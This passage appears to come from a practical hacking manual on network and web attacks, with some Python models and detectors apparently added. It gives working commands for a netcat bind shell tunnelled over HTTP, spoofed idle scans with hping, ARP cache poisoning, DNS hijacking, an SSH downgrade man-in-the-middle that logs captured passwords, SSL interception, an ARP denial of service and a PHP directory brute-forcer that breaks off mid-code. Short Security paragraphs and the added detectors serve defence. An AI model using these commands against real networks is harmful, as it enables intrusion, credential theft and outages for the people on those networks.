bash$ wget http://www.nocrew.org/software/httptunnel/httptunnel-3.0.5.tar.gz
bash$ tar xfvz httptunnel-3.0.5.tar.gz
bash$ cd httptunnel-3.0.5
bash$ ./configure && make && make install
We then obtain two executables: hts and htc (respectively the http server and the http client). One of these executables will thus be used as a server and the other as a client. We are going to bind a shell on machine B then attach our http tunnel to it, as follows:
Machine B
bash$ nc -l -p 9999 -e /bin/bash
bash$ su
bash# ./hts -F localhost:9999 80
The -F option specifies the source and the destination of the data received by the http tunnel. In this case, we have attached a shell to local port 9999, and the port used by our tunnel will be port 80 (the default port for web servers). Now we are going to connect from machine A.
Machine A
bash$ ./htc -F 2222 192.168.0.66:80
bash$ nc localhost 2222
cat /etc/issue;
Debian GNU/Linux 3.1 \n \l
Let us take a look at what Ethereal is seeing:
Ethereal sees http traffic passing. The data is hidden in http packets, and so passes through in a much less noticeable way.
Conclusion
The covert channel principle can apply to virtually all protocols (http, icmp, dns, ...). The thing to know is where and how to hide data within the protocol used.
Security
The best way to fight against firewall bypassing is to forbid direct access of internal stations to the Internet. You should implement a total restriction and integrate an internal proxy server, which will be the only machine authorised to communicate with the outside world. If internal stations want an outside connection, they will always have to go through this mandatory server. You can integrate the same security policy for servers accessible from the Internet by implementing reverse proxies, through which clients will always have to go.
4. Idle Host scanning
In the previous section, we discovered what IP spoofing was. We will now see how a hacker can use this technique to scan a server without leaving his IP address in the logs. The aim of this is to prove that the IPs in your log files can be faked, and to encourage you, where possible, to establish filtering rules so that no “idle host” can have access to the server, which will prevent the use of this scan technique. Let us take a closer look at this...
Idle host scanning is a technique found by the creator of Hping, which enables the scanning of a server's ports without leaving an IP in the logs, by using IP spoofing. But to do this, we need a machine that is not very active, as it is this machine that will help us determine the server's open ports.
Practical simulation of such an attack:
We are going to use three machines:
– An attacking machine on Linux or Unix equivalent which we will call A
– A target server called S
– A not very active machine called C
Machine A must be on Linux or equivalent with Hping installed (it can be downloaded from http://www.hping.org). First of all, what is going to be of interest to us is to observe the incrementation of the IP protocol's identification (id) number in the packets emitted by C. To do this, two conditions must be met: we must force machine C to send us tcp/ip packets (whatever they may be) in a continuous manner, and C must have no active connection for the whole duration of the operations (except, it goes without saying, with A). We can immediately see the advantage in choosing a client machine for C. As it is not a server, it is more likely that we will be the only ones communicating with it.
To dialogue with C and force it to reveal its id, two solutions can be imagined:
1) We try to initiate a connection on an active port of machine C by sending packets with the Syn flag set (this is very important, otherwise the machine will not answer). The machine will then answer by sending packets with the Syn and Ack flags set.
2) We send packets to a closed port (there is no need to set a flag). The machine will treat it as an error and send response packets with the Ack and Reset flags set.
Which is the best method? Both actually work very well; however the first one presents two major disadvantages: if we want to follow the same logic we have had since the beginning, choosing a machine C with even only one open port is absurd (in this case it is a server, and the risk of it establishing a connection with anyone other than A is high). Also, sending a flood of connection requests to C on a specific port could be interpreted unfavourably by a watchful administrator who checks his logs (he could believe it is SYN flooding or SYN scanning). We are therefore going to forge packets according to the second method, and to do this we will use hping.
Hping, just like Nemesis, is a tcp/ip packet forger. Why choose hping? Because hping has an interesting function that displays on the console the answers to the packets emitted via hping. All that has to be done is to type in the following command:
hping -r (for example: hping 192.168.1.1 -r)
Here, -r corresponds to the option showing the id increment as emissions take place (this option will be used only for clarification purposes).
Here is a capture, done with Ethereal, of the packets sent and received successively between machines A and C. In the capture, machine A has IP 192.168.1.2 and machine C has IP 192.168.1.1.
1st packet:
It is the IP protocol that is going to be of interest to us :). So the first packet is sent from machine A to machine C. It is a TCP packet sent to port 0 of machine C, with all flags at 0, and with a sequence number and an acknowledgement number. Please note that here the IP identification is equal to 0x934d.
2nd packet:
Machine C answers with a TCP packet with RST/ACK at 1. (This is normal as port 0 is not open). Please note that its IP identification number is 0x934d.
3rd packet: Machine A sends another TCP packet to port 0 with all flags at 0.
Please note that the IP identification number has been incremented considerably, from 0x848 to 0x1923.
4th packet: The machine answers with a TCP packet identical to the 2nd packet. Now look at the IP identification number: it has been incremented by +256!
The identification number of machine A is always incremented by +256. But remember that it is not the value of the increment that interests us here but rather the fact that it remains constant. Thanks to this identification number, we will be able to determine whether a port is open on server S. Now, machine A must send a spoofed packet to server S, to make it believe that machine C wishes to connect. To carry out the scan, the first window is left open and another one is opened in which we type:

    hping -a <spoofed source IP> -S -p <port> <server>

Example: hping -a 192.168.231.81 -S -p 21 192.168.231.1, where 22 is the port whose state (open or not) we are going to try to determine.
We launch both packet emissions simultaneously for a better analysis of the results. First terminal: emission of spoofed packets to server S.
Here, C asks for connections to S. The ID is incremented by +1 at each sending. Second terminal: emission of TCP/IP packets to client C.
Let us look at the same time at our second terminal, the only one of interest here. We notice that the packets' ids are all incremented by +1, but from the 3rd onwards the increment is doubled (+2). The ID is doubled during the emission of 6 packets, and exactly 6 packets had already been emitted (see the bottom of the previous capture). What can we conclude? As the ID has doubled, it can only mean one thing: 8 packets have been emitted by C that were not destined to A, hence the increment jump from +256 to +512. What were these packets? If you refer to the previous chapter, these were obviously packets going from C to S with the RST flag set. But why? Because C itself never requested a connection, so for each Syn/Ack it receives it informs S that this is an error.
We know that port 21 of the server of interest to us is closed. So we will repeat the same method, replacing port 22 with port 21. Let us take a look at the results. First terminal: emission of spoofed packets to server S.
Second terminal: emission of TCP/IP packets to client C.
Here, we can see that the ID has not changed. Why? Because a machine never responds to a Reset. When a port is closed, there is no "leaking" of packets, so the ID is no longer modified. You probably understand now how vitally important it is that machine C communicates only with A.
Conclusion
In this chapter, we have seen the working principle of this type of scan. Please note that Unix users make use of Fyodor's famous port scanner nmap (downloadable at http://www.insecure.org). It supports this type of scan and can be very powerful. You will also note that even if you are not in S's logs, you are in those of C. So a hacker can still be found...
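As an added example (not part of the booklet), here is a Python model of the three-party exchange explained above: A, C and S are plain objects, no packet leaves the machine, and the addresses are the constructed ones from the hping example. It shows why a constant IP-ID increment on C lets A count packets it never sees, and, on C's side, the check an administrator can apply to notice that C is being used as a relay. It assumes, as the text requires, that nobody else talks to C during the scan.

```python
"""Model of the IP-ID idle scan: A (scanner), C (idle client used as a
relay) and S (target server). Constructed addresses follow the hping
example in the text; nothing is sent on the network."""
from dataclasses import dataclass, field


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    flags: str          # "SYN", "SYN/ACK", "RST/ACK", "RST" or "" (no flags)
    ipid: int = 0


@dataclass
class Host:
    ip: str
    open_ports: set = field(default_factory=set)
    ipid: int = 0
    step: int = 256     # the constant increment observed in the captures (0x100)
    sent_syn_to: set = field(default_factory=set)   # peers this host really SYN'd
    log: list = field(default_factory=list)         # every packet received

    def _emit(self, dst, flags):
        # Every emitted IP packet consumes one IP-ID increment, whatever its
        # destination: this is what lets A count packets it never sees.
        self.ipid = (self.ipid + self.step) & 0xFFFF
        return Packet(self.ip, dst, 0, flags, self.ipid)

    def receive(self, pkt):
        """Apply the TCP reply rules used in the text; return the reply or None."""
        self.log.append(pkt)
        if pkt.flags == "SYN":
            if pkt.dport in self.open_ports:
                return self._emit(pkt.src, "SYN/ACK")
            return self._emit(pkt.src, "RST/ACK")
        if pkt.flags == "SYN/ACK" and pkt.src not in self.sent_syn_to:
            return self._emit(pkt.src, "RST")        # "I never asked for this"
        if pkt.flags == "":
            return self._emit(pkt.src, "RST/ACK")    # flagless probe, closed port
        return None     # nobody answers a RST (or a RST/ACK)


def probe_ipid(a_ip, c):
    """A sends a flagless packet to C (hping <C> -r) and reads the reply's IP-ID."""
    return c.receive(Packet(a_ip, c.ip, 0, "")).ipid


def idle_scan(a_ip, c, s, port, spoofed=6):
    """Infer the state of `port` on S from C's IP-ID alone.
    Returns (is_open, increments): increments counts IP-ID steps between two
    probes of C, i.e. 1 for A's own probe plus one per RST that C was
    provoked into sending to S."""
    before = probe_ipid(a_ip, c)
    for _ in range(spoofed):
        # A forges a SYN carrying C's source address (hping -a <C> -S -p <port> <S>)
        reply = s.receive(Packet(c.ip, s.ip, port, "SYN"))
        if reply is not None:
            c.receive(reply)            # S answers C, never A
    after = probe_ipid(a_ip, c)
    increments = ((after - before) & 0xFFFF) // c.step
    return increments > 1, increments


def unsolicited_synacks(host, threshold=3):
    """Relay-side check (the "you are in C's logs" remark of the conclusion):
    SYN/ACKs from peers this host never sent a SYN to, counted per peer.
    Returns {peer_ip: count} for peers at or above the threshold."""
    counts = {}
    for pkt in host.log:
        if pkt.flags == "SYN/ACK" and pkt.src not in host.sent_syn_to:
            counts[pkt.src] = counts.get(pkt.src, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for port in (22, 21):
        c = Host("192.168.231.81")                      # C, the idle client
        s = Host("192.168.231.1", open_ports={22})      # S, only port 22 open
        state, inc = idle_scan("192.168.231.2", c, s, port)
        print(f"port {port}: {'open' if state else 'closed'} ({inc} increments)")
        print("  C sees unsolicited SYN/ACKs:", unsolicited_synacks(c))
```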
5. Connections Hijacking
We are going to use the properties of the data transmission model on a local network in order to divert, through a third machine (the hacker's), the flows transiting on the network. On a LAN, packets destined to an IP address of the same network are not routed but sent directly to the communicating machine. So the packet will be encapsulated in an Ethernet frame (layer 2 of the OSI model) whose destination MAC address will be that of the machine associated to the IP address we want to reach. To know which MAC address is associated to an IP, the kernel consults its ARP cache, which maps the internal network's IPs to MACs. You can consult your cache with the arp -a command:

    arp -a
    Dantes (192.168.124.20) at 00:50:22:80:B3:34 [ether]
    ? (192.168.124.1) at 00:09:5B:44:AA:E4 [ether]
These entries in the cache are not permanent. At boot, the cache is empty; the physical address of the host we wish to reach is resolved the first time a packet is sent to an IP that is not yet associated to any MAC. What's more, these entries disappear after a certain timeout. The protocol that associates IP and MAC is ARP (Address Resolution Protocol).
A) ARP Cache Poisoning
Machine A wishes to reach machine B, but finds no cache entry corresponding to B. A broadcasts an ARP Request on the network asking for the MAC address of machine B. Machine B receives this packet and answers; at the same time, B notes A's MAC and associates it to A's IP in its own ARP cache. B then sends an ARP response to A, so that A can fill its ARP cache.

ARP Request sent by A:

    MAC SRC    IP SRC    MAC DST              IP DST
    MAC A      IP A      FF:FF:FF:FF:FF:FF    IP B

ARP response sent by B to A:

    MAC SRC    IP SRC    MAC DST    IP DST
    MAC B      IP B      MAC A      IP A
With the help of tcpdump, we can sniff the transiting ARP Requests:

    tcpdump arp
    tcpdump: listening
    15:57:28.027387 arp who-has Dantes tell 192.168.124.12
    15:57:28.028122 arp reply Dantes is-at 0:50:22:80:b3:34
The ARP protocol was never designed with security in mind, and this will allow us to hijack existing connections between two machines of the same LAN. Two security problems appear:
• The protocol keeps no state, meaning that a machine receiving an ARP response will accept it and update its cache even if it has not sent a previous ARP request.
• A machine receiving an ARP request automatically updates its cache to re-associate the IP and the MAC of the sender.
It is therefore possible to forge ARP requests or responses to or from a machine in order to corrupt its cache by associating a network IP to the MAC of the hacker's machine. So when a machine B sends a packet to A's IP, it will be encapsulated in an Ethernet frame whose physical destination is the hacker's. By proceeding in the same manner with A, the hacker can also hijack the flow from A to B. This type of operation can be done manually on Linux. First of all, we must activate routing on machine C (the command below enables IP forwarding, so that the diverted packets are passed on and the victims notice nothing):

    echo 1 > /proc/sys/net/ipv4/ip_forward
We are then going to send two ARP responses, one towards A and the other towards B. The prerequisite data is:

    Machine    IP                MAC
    A          192.168.124.1     00:09:5B:44:AA:E4
    B          192.168.124.20    00:50:22:80:B3:34
    C          192.168.124.12    00:90:4B:77:CC:D1
We are going to forge packets with the help of the ARPSpoof tool (available on both Linux and Windows). The options to pass are:
-i : Interface
-t : Optional, if all you want is to hijack the connection between a particular target and a host.
host : host towards which all connections must be hijacked. If the -t option is not used, then the connections of all the network's machines to this host will be hijacked:

    Laptop:/home/xdream# arpspoof 192.168.124.1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
    0:90:4b:77:cc:d1 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
Let us now display the contents of machine B's ARP cache:

    Dantes:~# arp -a
    ? (192.168.124.1) at 00:90:4B:77:CC:D1 [ether] on eth0
    ? (192.168.124.12) at 00:90:4B:77:CC:D1 [ether] on eth0
    ? (192.168.124.15) at 00:50:BA:5D:35:6C [ether] on eth0
    ? (192.168.124.10) at 00:50:8D:F9:E2:5E [ether] on eth0
We can see that machine A's address is associated to the hacker machine's MAC address. If we trace the path taken by a packet from machine B to machine A, we notice that it now passes through machine C:

    Dantes:~# traceroute 192.168.124.1
    traceroute to 192.168.124.1 (192.168.124.1), 30 hops max, 38 byte packets
     1  192.168.124.12 (192.168.124.12)  1.093 ms  36.272 ms  1.863 ms
     2  192.168.124.1 (192.168.124.1)  3.006 ms  2.242 ms  2.730 ms
Another tool, available on both Linux and Windows, can manage the whole hijacking more automatically: ettercap. The version used here is 0.6.0, which you will find at http://prdownloads.sourceforge.net/ettercap/ettercap-0.6.b.tar.gz?download. You can display a help panel with the h command. Select the two IPs between which you want to hijack the traffic; you will then be able to sniff the connections.
You can then hijack all traffic between these two machines (s command). All established connections can then be sniffed: select one, then press Enter.
Finally, it is possible to inject commands into an existing channel. Select the channel in question; you will have two windows, one for the client, the other for the server. With the help of , choose the window in which you wish to inject a command to be executed (it should be the server's) and open the injection window with the i key. Of course, the command you inject is sent as-is, so you must respect the format of the protocol concerned. If, for example, it were the FTP protocol and you wanted to create a directory, the command to send would be MKD dir.
B) DNS hijacking
The DNS protocol is used to resolve a host name, for example www.thehackademy.net, into an IP address, in order to establish a direct communication with the server in question. The DNS protocol's format is as follows:
The standard host name resolution procedure is the following:
1) The client sends a DNS request to the name server in order to resolve the name www.serv.com into its IP address.
2) The DNS server queries the serv.com domain's DNS in order to determine the IP of machine www.
3) The DNS server sends the IP address associated to www.serv.com back to the client in a DNS answer.
The principle of DNS hijacking is therefore to hijack a DNS response and replace the IP of the server the victim wishes to connect to with the hacker's. He will then be able to freely emulate a site to recover information (access codes, ...) or simply forward the connection to the real server so as to spy on the communication. We are going to use the Denver tool (on Linux) to redirect a connection request for www.google.com to the www.thehackademy.net website in a way that is transparent for the user. The options to pass are:
-g : Gateway IP.
-h : IP of the host to be hijacked.
-d : Domain to be spoofed.
-p : IP to which the connection must be hijacked.
    Laptop:/# denver -s -i wlan0 -g 192.168.124.1 -h 192.168.124.12 -d www.google.com -p 213.30.164.104
    Starting denver 1.0 --- [email protected]
    Error: the host and the local interface ip's are the same.
    Laptop:/# denver -s -i wlan0 -g 192.168.124.1 -h 192.168.124.10 -d www.google.com -p 213.30.164.104
    Starting denver 1.0 --- [email protected]
    Checking if host and gateway are up and running on the LAN ... Success.
    192.168.124.10 is beeing fooled.
    Waiting for DNS requests ...
    -------DNS request to 'www.google.com' spoofed successfully
Security
As the ARP protocol is used to update the tables, the best way to avoid this type of attack is to fill the ARP cache of each machine manually. For this we use the arp program, which lets us carry out this operation by associating each IP present on the network to its real physical address:

    arp -s x.x.x.x y-y-y-y-y-y
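As an added example (not part of the booklet), here is a small Python detector that applies the two ARP weaknesses described above to a tcpdump-style ARP log, checks replies against a static inventory, and renders the arp -s entries recommended in the Security paragraph. The log lines are constructed in the format of the tcpdump output shown earlier (with numeric addresses), and the inventory is taken from the Machine/IP/MAC table.

```python
import re

# Trusted inventory from the table above (IP -> MAC), the same data that the
# static `arp -s` mitigation would be fed. MACs are kept in lower case,
# two digits per byte, so that every source can be compared in one form.
TRUSTED = {
    "192.168.124.1": "00:09:5b:44:aa:e4",    # A
    "192.168.124.20": "00:50:22:80:b3:34",   # B
}

# Constructed sample in the `tcpdump arp` line format shown above: a normal
# request/reply pair, then replies of the kind arpspoof emits.
SAMPLE_LOG = """\
15:57:28.027387 arp who-has 192.168.124.20 tell 192.168.124.12
15:57:28.028122 arp reply 192.168.124.20 is-at 0:50:22:80:b3:34
15:58:01.100000 arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
15:58:02.100000 arp reply 192.168.124.1 is-at 0:90:4b:77:cc:d1
15:58:03.100000 arp reply 192.168.124.20 is-at 0:90:4b:77:cc:d1
"""

REQ = re.compile(r"^(\S+) arp who-has (\S+) tell (\S+)")
REP = re.compile(r"^(\S+) arp reply (\S+) is-at (\S+)")


def norm_mac(mac):
    """tcpdump prints 0:50:22:..., the arp cache shows 00:50:22:...; unify."""
    return ":".join(part.zfill(2).lower() for part in mac.split(":"))


def analyse_arp(log, trusted=TRUSTED):
    """Return a list of (timestamp, kind, ip, mac) alerts, where kind is:
    'unsolicited' : a reply for an IP no who-has was seen for (first
                    weakness above: caches accept replies they never asked for)
    'mismatch'    : the reply disagrees with the static inventory
    'conflict'    : the IP was already seen with a different MAC in this log"""
    pending = set()      # IPs asked for by a who-has and not yet answered
    seen = {}            # ip -> first MAC observed in the log
    alerts = []
    for line in log.splitlines():
        m = REQ.match(line)
        if m:
            pending.add(m.group(2))
            continue
        m = REP.match(line)
        if not m:
            continue
        ts, ip, mac = m.group(1), m.group(2), norm_mac(m.group(3))
        if ip in pending:
            pending.discard(ip)
        else:
            alerts.append((ts, "unsolicited", ip, mac))
        if ip in trusted and trusted[ip] != mac:
            alerts.append((ts, "mismatch", ip, mac))
        if seen.setdefault(ip, mac) != mac:
            alerts.append((ts, "conflict", ip, mac))
    return alerts


def static_arp_commands(trusted=TRUSTED):
    """Render the static entries of the Security paragraph (Linux syntax)."""
    return [f"arp -s {ip} {mac}" for ip, mac in sorted(trusted.items())]


if __name__ == "__main__":
    for alert in analyse_arp(SAMPLE_LOG):
        print("%s %-12s %-16s %s" % alert)
    print("\n".join(static_arp_commands()))
```

The second weakness (a request also rewrites the receiver's cache) needs the sender hardware address, which tcpdump only prints with -e; the same checks apply to it once parsed.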
6. Attacking secure protocols
A) SSH
SSH establishes a secure communication in command shell mode. There are today two versions of the SSH protocol, ssh1 and ssh2. The whole communication, as well as the login/password, is exchanged in encrypted form on the network. The establishment of the secure communication follows this process:
1) Connection request from the client.
2) The server sends its banner.
3) The server sends its public key.
4) A symmetric key generated by the client is encrypted with the public key provided by the server.
5) The symmetric key is sent to the server.
6) Communication is established.
Hijacking an SSH session is comparable to hijacking an SSL one. The hacker places himself between the client and the server and emulates an SSH server to which the client is redirected in order to identify himself. In turn, the hacker establishes a communication with the real SSH server thanks to the login and password obtained from the client. While ssh1 is vulnerable to this type of attack, ssh2 is supposed to be protected from it.
ssh2 protection
The server's public key is stored in the known_hosts file on the client side. If during the connection the key sent back is not the one recorded in the file, which will necessarily be the case here, the ssh client refuses to establish the communication and sends back this type of message:

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
    Someone could be eavesdropping on you right now (man-in-the-middle attack)!
    It is also possible that the RSA1 host key has just been changed.
    The fingerprint for the RSA1 key sent by the remote host is
    f3:cd:d9:fa:c4:c8:b2:3b:68:c5:38:4e:d4:b1:42:4f.
    Please contact your system administrator.
However, it is the server that tells the client which ssh protocol version (1 or 2) will be used, through the presentation banner it sends back:

    SSH-1.99-OpenSSH_2.2.0p1

So it is possible to force the client to use a protocol version other than the one it usually uses. The public key used with the ssh2 protocol is different from the one used with ssh1, even on the same server. As the key used with protocol version 1 is not the one recorded in the known_hosts file, the client asks the user whether it should be added. If the user answers yes, a secure communication is established through the hacker's machine, transparently for the victim. On Linux, the ssharp tool combined with the mss tool can carry out this attack. You will find both tools on the thehackademy.net website. Let us first compile mss:

    tar xzvf mss-0.3.tgz
    cd mss
    make all
    make install
We can then compile ssharp:

    tar xzvf 7350ssharp.tgz
    cd ssharp
    ./configure
    make
    make install
    cp ssh /usr/local/bin/ssharpclient
Be careful: ssharp is a modified version of the sshd daemon, a real daemon that will replace your previous version of OpenSSH if you have one.
Carrying out the attack
First, have the modified sshd daemon listen on port 10000:

    ./sshd -4 -p 10000
We will then hijack the connections. Let us activate routing:

    echo 1 > /proc/sys/net/ipv4/ip_forward
We then request that all connections directed to port 22 be redirected to local port 10000:

    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1000:65000 --dport 22 -j REDIRECT --to-port 10000
Finally, we hijack all communications with the target server with a standard ARP poisoning attack:

    arpspoof -i eth0 192.168.124.20
When the client establishes a connection, he receives a message of this type:

    Laptop:/home/xdream# ssh Dantes
    The authenticity of host 'dantes (192.168.124.20)' can't be established.
    RSA key fingerprint is d8:84:7a:96:36:15:2e:40:3e:7f:6e:e8:12:23:74:97.
    Are you sure you want to continue connecting (yes/no)? yes
If the client answers yes, he will be able to connect, and a temporary file of the form ssharp-IPSERVER.PID is created on the hacker's machine. You can then use the mss-client binary on this file to spy on the communication:

    mss-client /tmp/ssharp-192.168.124.20.11234

What's more, the captured logins and passwords are stored in the /tmp/ssharp file:

    Laptop:/home/xdream# cat /tmp/ssharp
    192.168.124.20:22 [xdream:password]
Security
The best protection against this type of attack is to have the client use the ssh2 protocol even if the server requests the use of ssh1. You can do this by giving the -2 option to the client:

    ssh -2 192.168.124.20
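An added Python model of the client-side decisions this section relies on (not the booklet's or OpenSSH's code): the known_hosts lookup that produces "ok", "changed" (the WARNING above) or "unknown" (the prompt the attack counts on), and the banner parsing behind the -2 recommendation. The record format "host[,ip] keytype base64-key", the key blobs and the strict flag (refuse unknown keys instead of prompting) are assumptions; the MD5 colon fingerprint follows the format shown in the messages above.

```python
import base64
import hashlib

# Constructed keys: the one the client already trusts for dantes, and a
# different one such as a relay would present.
GOOD_KEY = base64.b64encode(b"constructed ssh2 host key for dantes").decode()
MITM_KEY = base64.b64encode(b"constructed host key of a relay machine").decode()

# Constructed client-side known_hosts (simplified record format, see lead-in).
KNOWN_HOSTS = f"dantes,192.168.124.20 ssh-rsa {GOOD_KEY}\n"


def fingerprint(blob_b64):
    """MD5 colon-separated fingerprint of a base64 key blob, as in the
    'RSA key fingerprint is d8:84:...' line above."""
    digest = hashlib.md5(base64.b64decode(blob_b64)).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def load_known_hosts(text):
    """Map (name, keytype) -> base64 key; every alias on a line gets an entry."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or line.startswith("#"):
            continue
        for name in parts[0].split(","):
            entries[(name, parts[1])] = parts[2]
    return entries


def check_host_key(known, host, key_type, blob_b64, strict=False):
    """The client's decision when a server presents (key_type, blob_b64):
    'ok'      : identical to the stored key of that type, connect silently
    'changed' : a key of that type is stored but differs, refuse (WARNING)
    'unknown' : no key of that type stored, ask the user (yes/no prompt)
    'refused' : same situation as 'unknown', but strict mode never prompts.
    A protocol-1 key (ssh-rsa1) is a different type from the stored ssh-rsa
    key, which is why the downgrade lands in 'unknown' and not 'changed'."""
    stored = known.get((host, key_type))
    if stored is None:
        return "refused" if strict else "unknown"
    return "ok" if stored == blob_b64 else "changed"


def choose_protocol(banner, allowed=(2,)):
    """Parse 'SSH-<protoversion>-<software>' and pick the highest version
    both sides accept; None means the client refuses to continue.
    A protoversion of 1.99 advertises support for both 1 and 2."""
    proto = banner.split("-")[1]
    offered = {1, 2} if proto == "1.99" else {int(proto.split(".")[0])}
    for version in (2, 1):
        if version in offered and version in allowed:
            return version
    return None


if __name__ == "__main__":
    known = load_known_hosts(KNOWN_HOSTS)
    print("genuine server, ssh2 key :", check_host_key(known, "dantes", "ssh-rsa", GOOD_KEY))
    print("relay, ssh2 key          :", check_host_key(known, "dantes", "ssh-rsa", MITM_KEY))
    print("relay, ssh1 key          :", check_host_key(known, "dantes", "ssh-rsa1", MITM_KEY))
    print("relay, ssh1 key, strict  :", check_host_key(known, "dantes", "ssh-rsa1", MITM_KEY, True))
    print("relay fingerprint        :", fingerprint(MITM_KEY))
    print("client -2 vs 1.99 banner :", choose_protocol("SSH-1.99-OpenSSH_2.2.0p1"))
    print("client -2 vs ssh1-only   :", choose_protocol("SSH-1.5-OpenSSH_2.2.0p1"))
```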
B) SSL
The SSL protocol works by sending a public key certificate, which is used to encrypt the communication in a secure channel, following the same methodology as SSH. The attack is therefore in theory quite similar. The hacker emulates, on a relay machine through which the victim passes, an SSL server that decrypts and re-encrypts the communication to forward it to the final server. The Ettercap utility, which we have already studied, knows how to implement this type of attack without any particular option. Another method is to force the user to pass through a proxy server that also implements an SSL server (SSLProxy: http://www.obdev.at/products/ssl-proxy/). For conventional HTTP requests we will use Achilles on Windows. This utility is an HTTP proxy server which can log the communications it relays and modify the contents of requests or of answers destined to the client or the web server. Simply specify a port to listen on and activate the options: Intercept mode ON, Intercept Client Data, Intercept Server Data and ignore .jpg/.gif.
In the main window, you can modify the contents of the requests or of the web pages sent. Be careful when you forward the communication between the two parties in this mode, as you will have to validate each request or page with the Send button.
Security
The SSL certificates of known sites are generally referenced in databases automatically consulted by web browsers, in order to check that the certificate sent back is an authentic one. When it is a fake one, a warning is displayed.
Faced with this type of warning, you should not trust the server onto which you are connected, as you cannot be sure of the confidentiality of the communication.
7. Denial of Service
Denial of service attacks are critical ones in terms of company security, as their aim is to make the resources of a computer system unavailable. On a small scale, a denial of service attack makes a server application unavailable. On a medium scale, it does that to a machine. On a large scale, it can paralyse the whole network. We generally identify four types of denial of service:
• SYN flooding;
• exploitation of a bug;
• smurfing/DDoS;
• ARP cache poisoning.
SYN flooding consists in sending a great number of connection requests to a server without ever completing or cancelling them. Because each request is buffered until the connection's timeout, too many pending requests can saturate the memory of a service and prevent any later legitimate connection. The exploitation of a bug or of a vulnerability can cause certain server applications, or even the operating system, to malfunction and become unstable. Smurfing consists in impersonating a machine (the victim) and sending ping requests to broadcast addresses of subnetworks. The machines of these subnetworks then respond to a machine that never sent any data: for each request the attacker sends, the victim receives dozens of responses and is saturated. We should note that DDoS (Distributed Denial of Service) also consists in using several IT resources against one single machine. It is a more generic term, and the attack is said to be "distributed".
Recent viruses use the resources of infected machines to flood websites such as Microsoft's or SCO's with requests. On a local network, it is also possible to use ARP cache poisoning to make all the machines of the network unavailable for a few seconds.
Demonstration of a DoS: We will use ARP-SK, an ARP request forging kit. This tool allows us to forge ARP requests, and we will drive it through a Perl interface whose purpose is to use ARP-SK correctly to carry out a DoS-type attack. ARP-SK is available on both Windows and Linux. We will use it from a Linux machine, which changes nothing to the principle of the attack. ARP-SK is available at http://www.arp-sk.org. The Perl exploit is available at http://www.sysdream.com. From the attacking side, this is what the attack looks like:
Once the tool is launched, all the machines on the local network 192.168.1.x have updated their MAC address tables for all the network's IPs with the address specified by the attacker (here 12:34:56:78:9a:bc). No machine can then communicate with any other. The attack takes about 10 seconds.
CHAPTER IV WEB VULNERABILITIES
1. Site Mapping
The first thing a hacker will do during an attack on a Web service is to gather the banners (see chapter I: Information Acquisition) and map the site, to recover as much information as possible about his target. Mapping a website can be done in several ways: either the hacker has found a loophole allowing him to list the contents of all the directories of the server, or he uses appropriate software that follows all the page links from the index page of the website. This is not the end of the story, however. What interests the hacker are the files and directories forgotten by the webmaster and not linked from any public page. Intellitamper is one such program: it recovers the list of all files present on the server and can brute-force file or directory names to test for their existence. Intellitamper runs on Windows, so we will also look at the example of a PHP script that attacks with a dictionary.
Intellitamper
Intellitamper is a program with a very simple interface which lets us map a website without downloading its files (unlike website downloaders). By default, it works by following the links present on each page starting from the site index. To start the program, all that has to be done is to give it the URL of the site to scan and click on the small button in the shape of a magnifying glass. In the example above, "http://www.thehackademy.net" is our target. With the default options, Intellitamper will not use brute force to find the directories (or files) not linked from the pages.
In the options, one can ask Intellitamper to carry out a brute-force scan. The first thing to give it is the dictionary to use to find files or directories that are not linked (DictionaryClassic.txt).
Then, the option “Perform dictionary scan” must be selected in the “Files and folders” tab to activate brute force.
All that remains to be done is to click on “OK” to close the options window and relaunch Intellitamper.
Scan_web.php
Scan_web.php is a PHP script that looks for directories or files on a web server using a dictionary file. Here is the source code of the script:

    for ($count = 0; $count < $repnb; $count++) {
        if ($ssl) {
            $fp = @fsockopen("ssl://".$host, $port, $errno, $errstr, $timeout);
        } else {
            $fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
        }
        if (!$fp) {
            die("Connection impossible !!");
        } else {
            // build the request once, with the Host header needed by virtual hosts
            $header  = "GET /".$ss_rep.trim($rep[$count])." HTTP/1.0\n";
            $header .= "Host: ".$host."\n";
            $header .= "User-Agent: GoogleBot\n\n";
            fputs($fp, $header);
            // only the status line matters: read it, classify, stop
            while (!feof($fp)) {
                $nom = fgets($fp, 200);
                if (eregi("200 OK", $nom)) {
                    print("Found : $rep[$count] ");
                    break;
                } elseif (eregi("403 Forbidden", $nom)) {
                    print("Found (deny): $rep[$count] ");
                    break;
                } elseif (eregi("401 Authorization Required", $nom)) {
